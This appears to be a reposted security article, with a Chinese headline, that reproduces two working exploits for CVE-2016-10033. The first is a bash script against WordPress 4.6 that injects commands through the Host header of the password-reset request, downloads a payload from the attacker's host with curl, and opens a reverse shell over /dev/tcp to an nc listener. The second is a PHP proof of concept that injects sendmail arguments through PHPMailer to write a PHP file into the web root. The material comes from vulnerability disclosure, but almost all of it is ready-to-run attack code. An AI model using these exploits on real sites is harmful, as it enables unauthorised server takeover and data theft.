【更新WordPress4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞（CVE

  1 #!/bin/bash
  2 #
  3 
  4 # __ __ __ __ __
  5 
  6 # / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
  7 
  8 # / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
  9 
 10 # / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,
 11 
 12 # /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
 13 
 14 # /____/
 15 
 16 #
 17 
 18 #
 19 
 20 # WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
 21 
 22 # CVE-2016-10033
 23 
 24 #
 25 
 26 # wordpress-rce-exploit.sh (ver. 1.0)
 27 
 28 #
 29 
 30 #
 31 
 32 # Discovered and coded by
 33 
 34 #
 35 
 36 # Dawid Golunski (@dawid_golunski)
 37 
 38 # https://legalhackers.com
 39 
 40 #
 41 
 42 # ExploitBox project:
 43 
 44 # https://ExploitBox.io
 45 
 46 #
 47 
 48 # Full advisory URL:
 49 
 50 # https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
 51 
 52 #
 53 
 54 # Exploit src URL:
 55 
 56 # https://exploitbox.io/exploit/wordpress-rce-exploit.sh
 57 
 58 #
 59 
 60 #
 61 
 62 # Tested on WordPress 4.6:
 63 
 64 # https://github.com/WordPress/WordPress/archive/4.6.zip
 65 
 66 #
 67 
 68 # Usage:
 69 
 70 # ./wordpress-rce-exploit.sh target-wordpress-url
 71 
 72 #
 73 
 74 #
 75 
 76 # Disclaimer:
 77 
 78 # For testing purposes only
 79 
 80 #
 81 
 82 #
 83 
 84 # -----------------------------------------------------------------
 85 
 86 #
 87 
 88 # Interested in vulns/exploitation?
 89 
 90 #
 91 
 92 #
 93 
 94 # .;lc'
 95 
 96 # .,cdkkOOOko;.
 97 
 98 # .,lxxkkkkOOOO000Ol'
 99 
100 # .':oxxxxxkkkkOOOO0000KK0x:'
101 
102 # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
103 
104 # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
105 
106 # '';ldxxxxxdc,. ,oOXXXNNNXd;,.
107 
108 # .ddc;,,:c;. ,c: .cxxc:;:ox:
109 
110 # .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
111 
112 # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
113 
114 # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
115 
116 # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
117 
118 # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
119 
120 # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
121 
122 # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
123 
124 # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
125 
126 # .dxxxxxdl;. ., .. .;cdxxxxxx:
127 
128 # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
129 
130 # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
131 
132 # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
133 
134 # .':oxxxxxxxxx.ckkkkkkkkxl,.
135 
136 # .,cdxxxxx.ckkkkkxc.
137 
138 # .':odx.ckxl,.
139 
140 # .,.'.
141 
142 #
143 
144 # https://ExploitBox.io
145 
146 #
147 
148 # https://twitter.com/Exploit_Box
149 
150 #
151 
152 # -----------------------------------------------------------------
153 
154 rev_host="192.168.57.1"
155 
156 function prep_host_header() {
157 
158 cmd="$1"
159 
160 rce_cmd="\${run{$cmd}}";
161 
162 # replace / with ${substr{0}{1}{$spool_directory}}
163 
164 #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
165 
166 rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
167 
168 # replace ' ' (space) with
169 
170 #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
171 
172 rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
173 
174 #return "target(any -froot@localhost -be $rce_cmd null)"
175 
176 host_header="target(any -froot@localhost -be $rce_cmd null)"
177 
178 return 0
179 
180 }
181 
182 #cat exploitbox.ans
183 
184 intro="
185 
186 DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
187 
188 bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
189 
190 G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
191 
192 G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
193 
194 IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
195 
196 IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
197 
198 X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
199 
200 b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
201 
202 NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
203 
204 TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
205 
206 QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
207 
208 NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
209 
210 G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
211 
212 eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
213 
214 WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
215 
216 TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
217 
218 ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
219 
220 MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
221 
222 G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
223 
224 WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
225 
226 NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
227 
228 MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
229 
230 X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
231 
232 bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
233 
234 intro2="
235 
236 ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
237 
238 fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
239 
240 MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
241 
242 ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
243 
244 aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
245 
246 fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
247 
248 ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
249 
250 bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
251 
252 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
253 
254 ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
255 
256 bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
257 
258 cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
259 
260 echo "$intro" | base64 -d
261 
262 echo "$intro2" | base64 -d
263 
264 if [ "$#" -ne 1 ]; then
265 
266 echo -e "Usage:\n$0 target-wordpress-url\n"
267 
268 exit 1
269 
270 fi
271 
272 target="$1"
273 
274 echo -ne "\e[91m[*]\033[0m"
275 
276 read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
277 
278 echo
279 
280 if [ "$choice" == "y" ]; then
281 
282 echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
283 
284 echo -e "\e[92m[+]\033[0m Connected to the target"
285 
286 # Serve payload/bash script on :80
287 
288 RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
289 
290 echo "$RCE_exec_cmd" > rce.txt
291 
292 python -mSimpleHTTPServer 80 2>/dev/null >&2 &
293 
294 hpid=$!
295 
296 # Save payload on the target in /tmp/rce
297 
298 cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
299 
300 prep_host_header "$cmd"
301 
302 curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
303 
304 echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
305 
306 # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
307 
308 cmd="/bin/bash /tmp/rce"
309 
310 prep_host_header "$cmd"
311 
312 curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
313 
314 echo -e "\n\e[92m[+]\033[0m Payload executed!"
315 
316 echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
317 
318 nc -vv -l 1337
319 
320 echo
321 
322 else
323 
324 echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
325 
326 exit 0
327 
328 fi
329 
330 echo "Exiting..."
331 
332 exit 0
333 
334  

 1 php 
 2 /* 
 3 PHPMailer <5.2.18 Remote Code Execution (CVE-2016-10033) 
 4 A simple PoC (working on Sendmail MTA) 
 5 It will inject the following parameters to sendmail command: 
 6 Arg no. 0 == [/usr/sbin/sendmail] 
 7 Arg no. 1 == [-t] 
 8 Arg no. 2 == [-i] 
 9 Arg no. 3 == [-fattacker\] 
10 Arg no. 4 == [-oQ/tmp/] 
11 Arg no. 5 == [-X/var/www/cache/phpcode.php] 
12 Arg no. 6 == [some"@email.com] 
13 which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
14 The resulting file will contain the payload passed in the body of the msg: 
15 09607 <<<--b1_cb4566aa51be9f090d9419163e492306 
16 09607 <<17 09607 <<<
18 09607 <<< 
19 09607 <<<
20 09607 <<<
21 09607 <<<
22 09607 <<<--b1_cb4566aa51be9f090d9419163e492306-- 
23 See the full advisory URL for details. 
24 */ 
25 // Attacker's input coming from untrusted source such as $_GET , $_POST etc. 
26 // For example from a Contact form 
27 $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
28 $msg_body  = ""; 
29 // ------------------ 
30 // mail() param injection via the vulnerability in PHPMailer 
31 require_once('class.phpmailer.php'); 
32 $mail = new PHPMailer(); // defaults to using php "mail()" 
33 $mail->SetFrom($email_from, 'Client Name'); 
34 $address = "customer_feedback@company-X.com"; 
35 $mail->AddAddress($address, "Some User"); 
36 $mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
37 $mail->MsgHTML($msg_body); 
38 if(!$mail->Send()) { 
39 echo "Mailer Error: " . $mail->ErrorInfo; 
40 } else { 
41 echo "Message sent!\n"; 
42 }